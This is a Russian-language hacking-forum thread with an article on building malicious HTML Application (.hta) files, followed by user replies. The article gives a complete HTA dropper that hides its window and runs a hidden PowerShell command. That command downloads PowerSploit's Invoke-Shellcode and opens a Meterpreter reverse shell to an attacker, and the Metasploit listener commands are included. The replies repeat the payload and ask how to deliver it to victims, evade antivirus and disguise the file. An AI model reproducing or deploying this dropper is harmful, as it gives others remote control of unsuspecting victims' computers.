Статья Малварь на HTML или HTA для хакера

Конкурс

Статья для участия в конкурсе на Codeby. КЛИК!

{-- == ВВЕДЕНИЕ == --}

В этой статье будет рассказано о разработке вредоносных приложений на HTML. Но возникает вопрос, а зачем это вообще нужно? Существует очень много ситуаций, когда такая малварь может пригодиться. И чаще всего, эти ситуации прикладные. Например, социально-технический вектор. Расширение .hta не вызывает особых подозрений, а значит может быть использовано в данном случае.

{-- == ОСНОВНАЯ ЧАСТЬ == --}

Кто-то из вас скажет, что HTML не является языком программирования и будет прав, но в Windows существует возможность безбраузерного взаимодействия с документами HTML. Эта технология носит название HTA (HTML Application).
Эти приложения имеют расширения ".hta" и возможность их создания вышла уже в марте 1999 года. Так как HTA поддерживает исполнение сценариев, они могут использоваться для выполнения вредоносного кода.

Прочитать об этой технологии вы можете здесь:

Ссылка на статью в Wikipedia

Ссылка скрыта от гостей

Запуск HTA приложений происходит с помощью прикладной программы mshta.exe, которая использует недокументированную функцию RunHTMLApplication для их запуска. По умолчанию файлам с расширением .hta для запуска присвоена программа mshta.exe, поэтому для запуска HTA файлов достаточно сохранить их с нужным расширением. Давайте рассмотрим, как именно происходит разработка HTML Application приложений.

Для начала, создадим файл с расширением .hta и сохраним его на диске.

Любопытный факт. Если запустить файл теперь, то особого прока это нам не принесёт, однако файл уже находится в рабочем состоянии.

В каждой программе, в каждом языке программирования есть определённый скелет, с которым необходимо работать. У HTA он такой:

<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="Имя приложения"
    BORDER="Вид оформления окна. Варианты: thin/dialog/none/thick."
    BORDERSTYLE="Стиль рамки окна. Варианты: complex, normal, raised, static, sunken"
    CAPTION="Наличие загаловка у окна. Варианты: yes/no"
    maximizeButton="Наличие кнопки «Восстановить». Варианты: yes/no"
    minimizeButton="наличие кнопки «свернуть». Варианты: yes/no"
    ICON="Путь к значку окна в формате ICO (32x32)"
    SHOWINTASKBAR="Отображение документа в панели задач Windows. Варианты: yes/no"
    SINGLEINSTANCE="Можно ли открывать документы с тем же APPLIcATIONNAME? Варианты: yes/no"
    SYSMENU="Наличие системного меню и кнопок управления окном в заголовке окна. Варианты: yes/no"
    VERSION="Версия HTA. Я обычно ставлю 1.0"
    WINDOWSTATE="Исходный размер окна. Варианты: normal, minimize, maximize."/>
</head>

<body>
   Тело документа.
</body>

</html>

Как я уже сказал выше в HTA можно добавлять скрипты, как VBScript или JavaScript. Добавляется он также как и в обычные страницы. Кстати, аргументы с которым было запущено приложение можно получить с помощью атрибута commandLine элемента HTA:APPLICATION. Вот пример небольшого HTA приложения.

<html>
  <head>
    <title>HTA Test</title>
      <HTA:APPLICATION
       APPLICATIONNAME="Codeby"
       SCROLL="yes"
       SINGLEINSTANCE="yes"
       WINDOWSTATE="maximize"
      />
  </head>


  <body>
   <script language="VBScript">
       Msgbox "Hello, Codeby.NET!"
   </script>
  </body>
</html>

Сохраним и запустим это и мы получим примерно следующий результат.

Как вы можете увидеть, скрипт был успешно запущен и отработан. Мы познакомились с основами технологии HTML Application. Теперь, можно перейти к самой теме статьи.

Давайте создадим приложения для получения сессии в Meterpreter. Нам нужно исключить появление окна, поэтому скелет, с которым мы будем работать будет такой:

<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="MSession"
    BORDER="none"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"
   />
</head>
<body>
</body>
</html>

Теперь, добавим запуск вредоносной Powershell команды через VBScript. Сначала, подготовим PowerShell команду.

1. Не будем показывать окно командной строки, отключим использование профиля powershell, отключим использование интерактивного режима и разрешим запуск сторонних скриптов. Этого можно достичь с помощью этих опций.

-w hidden -nop -noni -exec bypass

2. Подготовим вредоносный payload. Можно использовать эту нагрузку, которая предоставит нам meterpreter shell. Используем PowerSploit скрипт. Для этого скачаем его и запустим с нужными параметрами.

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

,
где вместо 192.168.0.106 и 8007 укажите IP и порт атакующего.

3. Соберём команду и она примет следующий вид:

powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

Теперь, вставим следующий VBScript в HTA файл.

Window.ReSizeTo 0,0
'Делаем окно невидимым, уменьшим его размер до минимального
Window.MoveTo -4000, -4000
'Выносим окно за пределы видимости
 
Set wsh = CreateObject("wscript.shell")
'Создаём объект для выполения команд
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
'Выполняем команду
Window.Close
'Завершаем работу

После данной манипуляции HTA файл приобретает следующий вид:

<html>
  <head>
    <HTA:APPLICATION ID="oHTA"
      APPLICATIONNAME="MSession"
      BORDER="none"
      SHOWINTASKBAR="no"
      SINGLEINSTANCE="no"
      SYSMENU="no"
      VERSION="1.0"
      WINDOWSTATE="minimize"
     />
  </head>

  <body>
    <script language="VBScript">
      Window.ReSizeTo 0,0
      Window.MoveTo -4000, -4000
 
      Set wsh = CreateObject("wscript.shell")
      wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
      Window.Close
    </script>
  </body>
</html>

Сохраните этот файл на диске.

Запустим Meterpreter Listener на ПК атакующего:

Вот последовательность команд для его запуска:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run

, где вместо 192.168.0.106 и 8007 указываем IP атакующего и желаемый порт.


Теперь, запустив вредоносный HTA документ мы получим meterpreter сессию:

{-- == ЗАКЛЮЧЕНИЕ == --}

На скриншоте выше видно, что сессия открылась успешно и мы можем взаимодействовать с заражённым компьютером.

Ну, на этом всё. Спасибо за внимание.

 

[r0hack]

- вирусы, говоришь, пишешь?
- да
- на чём же?
- на ХТМЛ

Да вы че, я уже давно на CSS пишу...

 

[maonstream58]

Выполнил все по статье. На сколько я понял, сессию поймал. А что дальше делать? Как по файловой системе перемещаться и тд?)

 

[akv8]

session 1
help

Гугли Meterpreter, читай.

 

[Traun]

Что по поводу детекта АВ?
Стоит ли вообще браться?)
Или криптуется?

 

[erlan1749]

Приветствую!
Есть несколько вопросов.
1. Этот код можно разместить а apache2 в папку www и скормить ссылку жертве или это только как файл работает?:
<html>
<head>
<HTA:APPLICATION ID="oHTA"
APPLICATIONNAME="MSession"
BORDER="none"
SHOWINTASKBAR="no"
SINGLEINSTANCE="no"
SYSMENU="no"
VERSION="1.0"
WINDOWSTATE="minimize"
/>
</head>

<body>
<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -4000, -4000

Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
Window.Close
</script>
</body>
</html>
2.вопрос.В листенере указывать iport локальный или внешний и порт пробрасывать в роутере?:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run
3. вопрос. В строке нужно менять"

Ссылка скрыта от гостей

" или оставить всё как есть? :
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
4.вопрос. Этот скрипт ведь можно ещё и за инжектить через к примеру xerosploit(в локальной сети), или я ошибаюсь?:
<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -4000, -4000

Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
Window.Close
</script>

 

[Сергей Попов]

html

Пожалуйста оформляйте код:

 

[erlan1749]

Пожалуйста оформляйте код:

Посмотреть вложение 15569

хорошо, буду знать

 

[R2D2]

Эх где мой 2006, где мои ботнеты под гибридный hta с отправкой статистики в секрьюрный вебчат, r0hack так тоже шутили шарповцы и плюсы, но умолкали когда это сцуко работало

Что по поводу детекта АВ?
Стоит ли вообще браться?)
Или криптуется?

Всё палися, всё авер, не стоит вообще даже время тратить

 

[SooLFaa]

Вот. Вот это статья. Не придраться. Круто.

 

[OneDollar]

Самый большой минус - иконка приложения, никакого доверия она не вызывает.

Чё есть варианты как ее изменить?)

 

[erlan1749]

Конкурс

Статья для участия в конкурсе на Codeby. КЛИК!

{-- == ВВЕДЕНИЕ == --}

В этой статье будет рассказано о разработке вредоносных приложений на HTML. Но возникает вопрос, а зачем это вообще нужно? Существует очень много ситуаций, когда такая малварь может пригодиться. И чаще всего, эти ситуации прикладные. Например, социально-технический вектор. Расширение .hta не вызывает особых подозрений, а значит может быть использовано в данном случае.

{-- == ОСНОВНАЯ ЧАСТЬ == --}

Кто-то из вас скажет, что HTML не является языком программирования и будет прав, но в Windows существует возможность безбраузерного взаимодействия с документами HTML. Эта технология носит название HTA (HTML Application).
Эти приложения имеют расширения ".hta" и возможность их создания вышла уже в марте 1999 года. Так как HTA поддерживает исполнение сценариев, они могут использоваться для выполнения вредоносного кода.

Прочитать об этой технологии вы можете здесь:

Ссылка на статью в Wikipedia

Ссылка скрыта от гостей

Запуск HTA приложений происходит с помощью прикладной программы mshta.exe, которая использует недокументированную функцию RunHTMLApplication для их запуска. По умолчанию файлам с расширением .hta для запуска присвоена программа mshta.exe, поэтому для запуска HTA файлов достаточно сохранить их с нужным расширением. Давайте рассмотрим, как именно происходит разработка HTML Application приложений.

Для начала, создадим файл с расширением .hta и сохраним его на диске.

Посмотреть вложение 12948

Любопытный факт. Если запустить файл теперь, то особого прока это нам не принесёт, однако файл уже находится в рабочем состоянии.

Посмотреть вложение 12949

В каждой программе, в каждом языке программирования есть определённый скелет, с которым необходимо работать. У HTA он такой:

<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="Имя приложения"
    BORDER="Вид оформления окна. Варианты: thin/dialog/none/thick."
    BORDERSTYLE="Стиль рамки окна. Варианты: complex, normal, raised, static, sunken"
    CAPTION="Наличие загаловка у окна. Варианты: yes/no"
    maximizeButton="Наличие кнопки «Восстановить». Варианты: yes/no"
    minimizeButton="наличие кнопки «свернуть». Варианты: yes/no"
    ICON="Путь к значку окна в формате ICO (32x32)"
    SHOWINTASKBAR="Отображение документа в панели задач Windows. Варианты: yes/no"
    SINGLEINSTANCE="Можно ли открывать документы с тем же APPLIcATIONNAME? Варианты: yes/no"
    SYSMENU="Наличие системного меню и кнопок управления окном в заголовке окна. Варианты: yes/no"
    VERSION="Версия HTA. Я обычно ставлю 1.0"
    WINDOWSTATE="Исходный размер окна. Варианты: normal, minimize, maximize."/>
</head>

<body>
   Тело документа.
</body>

</html>

Как я уже сказал выше в HTA можно добавлять скрипты, как VBScript или JavaScript. Добавляется он также как и в обычные страницы. Кстати, аргументы с которым было запущено приложение можно получить с помощью атрибута commandLine элемента HTA:APPLICATION. Вот пример небольшого HTA приложения.

<html>
  <head>
    <title>HTA Test</title>
      <HTA:APPLICATION
       APPLICATIONNAME="Codeby"
       SCROLL="yes"
       SINGLEINSTANCE="yes"
       WINDOWSTATE="maximize"
      />
  </head>


  <body>
   <script language="VBScript">
       Msgbox "Hello, Codeby.NET!"
   </script>
  </body>
</html>

Сохраним и запустим это и мы получим примерно следующий результат.

Посмотреть вложение 12950

Как вы можете увидеть, скрипт был успешно запущен и отработан. Мы познакомились с основами технологии HTML Application. Теперь, можно перейти к самой теме статьи.

Давайте создадим приложения для получения сессии в Meterpreter. Нам нужно исключить появление окна, поэтому скелет, с которым мы будем работать будет такой:

<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="MSession"
    BORDER="none"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"
   />
</head>
<body>
</body>
</html>

Теперь, добавим запуск вредоносной Powershell команды через VBScript. Сначала, подготовим PowerShell команду.

1. Не будем показывать окно командной строки, отключим использование профиля powershell, отключим использование интерактивного режима и разрешим запуск сторонних скриптов. Этого можно достичь с помощью этих опций.

-w hidden -nop -noni -exec bypass

2. Подготовим вредоносный payload. Можно использовать эту нагрузку, которая предоставит нам meterpreter shell. Используем PowerSploit скрипт. Для этого скачаем его и запустим с нужными параметрами.

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

,
где вместо 192.168.0.106 и 8007 укажите IP и порт атакующего.

3. Соберём команду и она примет следующий вид:

powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

Теперь, вставим следующий VBScript в HTA файл.

Window.ReSizeTo 0,0
'Делаем окно невидимым, уменьшим его размер до минимального
Window.MoveTo -4000, -4000
'Выносим окно за пределы видимости

Set wsh = CreateObject("wscript.shell")
'Создаём объект для выполения команд
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
'Выполняем команду
Window.Close
'Завершаем работу

После данной манипуляции HTA файл приобретает следующий вид:

<html>
  <head>
    <HTA:APPLICATION ID="oHTA"
      APPLICATIONNAME="MSession"
      BORDER="none"
      SHOWINTASKBAR="no"
      SINGLEINSTANCE="no"
      SYSMENU="no"
      VERSION="1.0"
      WINDOWSTATE="minimize"
     />
  </head>

  <body>
    <script language="VBScript">
      Window.ReSizeTo 0,0
      Window.MoveTo -4000, -4000

      Set wsh = CreateObject("wscript.shell")
      wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
      Window.Close
    </script>
  </body>
</html>

Сохраните этот файл на диске.

Запустим Meterpreter Listener на ПК атакующего:

Посмотреть вложение 12951

Вот последовательность команд для его запуска:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run

, где вместо 192.168.0.106 и 8007 указываем IP атакующего и желаемый порт.


Теперь, запустив вредоносный HTA документ мы получим meterpreter сессию:

Посмотреть вложение 12952

{-- == ЗАКЛЮЧЕНИЕ == --}

На скриншоте выше видно, что сессия открылась успешно и мы можем взаимодействовать с заражённым компьютером.

Ну, на этом всё. Спасибо за внимание.

Как вместо этого:

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

добавить свой код полезной нагрузки(именно в виде кода, а не ссылки)?

 

[kot-gor]

возможно вам это поможет.
https://codeby.net/threads/powershell-dlja-xakera-chast-ii.58620/ только запускайте во второй версии питона

 

[erlan1749]

Конкурс

Статья для участия в конкурсе на Codeby. КЛИК!

{-- == ВВЕДЕНИЕ == --}

В этой статье будет рассказано о разработке вредоносных приложений на HTML. Но возникает вопрос, а зачем это вообще нужно? Существует очень много ситуаций, когда такая малварь может пригодиться. И чаще всего, эти ситуации прикладные. Например, социально-технический вектор. Расширение .hta не вызывает особых подозрений, а значит может быть использовано в данном случае.

{-- == ОСНОВНАЯ ЧАСТЬ == --}

Кто-то из вас скажет, что HTML не является языком программирования и будет прав, но в Windows существует возможность безбраузерного взаимодействия с документами HTML. Эта технология носит название HTA (HTML Application).
Эти приложения имеют расширения ".hta" и возможность их создания вышла уже в марте 1999 года. Так как HTA поддерживает исполнение сценариев, они могут использоваться для выполнения вредоносного кода.

Прочитать об этой технологии вы можете здесь:

Ссылка на статью в Wikipedia

Ссылка скрыта от гостей

Запуск HTA приложений происходит с помощью прикладной программы mshta.exe, которая использует недокументированную функцию RunHTMLApplication для их запуска. По умолчанию файлам с расширением .hta для запуска присвоена программа mshta.exe, поэтому для запуска HTA файлов достаточно сохранить их с нужным расширением. Давайте рассмотрим, как именно происходит разработка HTML Application приложений.

Для начала, создадим файл с расширением .hta и сохраним его на диске.

Посмотреть вложение 12948

Любопытный факт. Если запустить файл теперь, то особого прока это нам не принесёт, однако файл уже находится в рабочем состоянии.

Посмотреть вложение 12949

В каждой программе, в каждом языке программирования есть определённый скелет, с которым необходимо работать. У HTA он такой:

<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="Имя приложения"
    BORDER="Вид оформления окна. Варианты: thin/dialog/none/thick."
    BORDERSTYLE="Стиль рамки окна. Варианты: complex, normal, raised, static, sunken"
    CAPTION="Наличие загаловка у окна. Варианты: yes/no"
    maximizeButton="Наличие кнопки «Восстановить». Варианты: yes/no"
    minimizeButton="наличие кнопки «свернуть». Варианты: yes/no"
    ICON="Путь к значку окна в формате ICO (32x32)"
    SHOWINTASKBAR="Отображение документа в панели задач Windows. Варианты: yes/no"
    SINGLEINSTANCE="Можно ли открывать документы с тем же APPLIcATIONNAME? Варианты: yes/no"
    SYSMENU="Наличие системного меню и кнопок управления окном в заголовке окна. Варианты: yes/no"
    VERSION="Версия HTA. Я обычно ставлю 1.0"
    WINDOWSTATE="Исходный размер окна. Варианты: normal, minimize, maximize."/>
</head>

<body>
   Тело документа.
</body>

</html>

Как я уже сказал выше в HTA можно добавлять скрипты, как VBScript или JavaScript. Добавляется он также как и в обычные страницы. Кстати, аргументы с которым было запущено приложение можно получить с помощью атрибута commandLine элемента HTA:APPLICATION. Вот пример небольшого HTA приложения.

<html>
  <head>
    <title>HTA Test</title>
      <HTA:APPLICATION
       APPLICATIONNAME="Codeby"
       SCROLL="yes"
       SINGLEINSTANCE="yes"
       WINDOWSTATE="maximize"
      />
  </head>


  <body>
   <script language="VBScript">
       Msgbox "Hello, Codeby.NET!"
   </script>
  </body>
</html>

Сохраним и запустим это и мы получим примерно следующий результат.

Посмотреть вложение 12950

Как вы можете увидеть, скрипт был успешно запущен и отработан. Мы познакомились с основами технологии HTML Application. Теперь, можно перейти к самой теме статьи.

Давайте создадим приложения для получения сессии в Meterpreter. Нам нужно исключить появление окна, поэтому скелет, с которым мы будем работать будет такой:

<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="MSession"
    BORDER="none"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"
   />
</head>
<body>
</body>
</html>

Теперь, добавим запуск вредоносной Powershell команды через VBScript. Сначала, подготовим PowerShell команду.

1. Не будем показывать окно командной строки, отключим использование профиля powershell, отключим использование интерактивного режима и разрешим запуск сторонних скриптов. Этого можно достичь с помощью этих опций.

-w hidden -nop -noni -exec bypass

2. Подготовим вредоносный payload. Можно использовать эту нагрузку, которая предоставит нам meterpreter shell. Используем PowerSploit скрипт. Для этого скачаем его и запустим с нужными параметрами.

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

,
где вместо 192.168.0.106 и 8007 укажите IP и порт атакующего.

3. Соберём команду и она примет следующий вид:

powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

Теперь, вставим следующий VBScript в HTA файл.

Window.ReSizeTo 0,0
'Делаем окно невидимым, уменьшим его размер до минимального
Window.MoveTo -4000, -4000
'Выносим окно за пределы видимости

Set wsh = CreateObject("wscript.shell")
'Создаём объект для выполения команд
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
'Выполняем команду
Window.Close
'Завершаем работу

После данной манипуляции HTA файл приобретает следующий вид:

<html>
  <head>
    <HTA:APPLICATION ID="oHTA"
      APPLICATIONNAME="MSession"
      BORDER="none"
      SHOWINTASKBAR="no"
      SINGLEINSTANCE="no"
      SYSMENU="no"
      VERSION="1.0"
      WINDOWSTATE="minimize"
     />
  </head>

  <body>
    <script language="VBScript">
      Window.ReSizeTo 0,0
      Window.MoveTo -4000, -4000

      Set wsh = CreateObject("wscript.shell")
      wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
      Window.Close
    </script>
  </body>
</html>

Сохраните этот файл на диске.

Запустим Meterpreter Listener на ПК атакующего:

Посмотреть вложение 12951

Вот последовательность команд для его запуска:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run

, где вместо 192.168.0.106 и 8007 указываем IP атакующего и желаемый порт.


Теперь, запустив вредоносный HTA документ мы получим meterpreter сессию:

Посмотреть вложение 12952

{-- == ЗАКЛЮЧЕНИЕ == --}

На скриншоте выше видно, что сессия открылась успешно и мы можем взаимодействовать с заражённым компьютером.

Ну, на этом всё. Спасибо за внимание.

Как сделать такую же ссылку:

Ссылка скрыта от гостей

 

[PingVinich]

Приветствую!
Есть несколько вопросов.
1. Этот код можно разместить а apache2 в папку www и скормить ссылку жертве или это только как файл работает?:
<html>
<head>
<HTA:APPLICATION ID="oHTA"
APPLICATIONNAME="MSession"
BORDER="none"
SHOWINTASKBAR="no"
SINGLEINSTANCE="no"
SYSMENU="no"
VERSION="1.0"
WINDOWSTATE="minimize"
/>
</head>

<body>
<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -4000, -4000

Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
Window.Close
</script>
</body>
</html>
2.вопрос.В листенере указывать iport локальный или внешний и порт пробрасывать в роутере?:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run
3. вопрос. В строке нужно менять"

Ссылка скрыта от гостей

" или оставить всё как есть? :
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
4.вопрос. Этот скрипт ведь можно ещё и за инжектить через к примеру xerosploit(в локальной сети), или я ошибаюсь?:
<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -4000, -4000

Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
Window.Close
</script>

Можно, конечно, но смысла мало будет. ActiveX есть только в IE, и то, он урезанный, так что работать не будет.
[automerge]1522985510[/automerge]

Как сделать такую же ссылку:

Ссылка скрыта от гостей

Не понял тебя.

 

[erlan1749]

Можно, конечно, но смысла мало будет. ActiveX есть только в IE, и то, он урезанный, так что работать не будет.
[automerge]1522985510[/automerge]

Не понял тебя.

ну когда переходишь по этой ссылке каспер ругается на шелл код, как сделать также но с моим кодом?

 

[z3r0c10wn]

Для запуска Active X (Да фреймворк только для IE как таковой) в хроме есть IETab расширение. В Лисе тоже какое то было. Ну и стоит не забывать о NPAPI

 

[ImAAssholleeeee]

Ребят, хелпа нужна. Когда открывается хост все как надо сессия я больше ничего в терминале делать не могу. То есть как бы могу писать но ничего это не даст по скольку нету строки meterpreter >. кто знает что делать?

 

[OneDollar]

Ребят, хелпа нужна. Когда открывается хост все как надо сессия я больше ничего в терминале делать не могу. То есть как бы могу писать но ничего это не даст по скольку нету строки meterpreter >. кто знает что делать?

перекомпилировать, сожрал наверное ав.

 

[xojovara]

Подскажите где эту программу скачать Meterpreter Listener .. пжл или как я поняла это Linux?

 

[Joseph Brosnen]

А возможен ли запуск hta приложений как-то из браузера?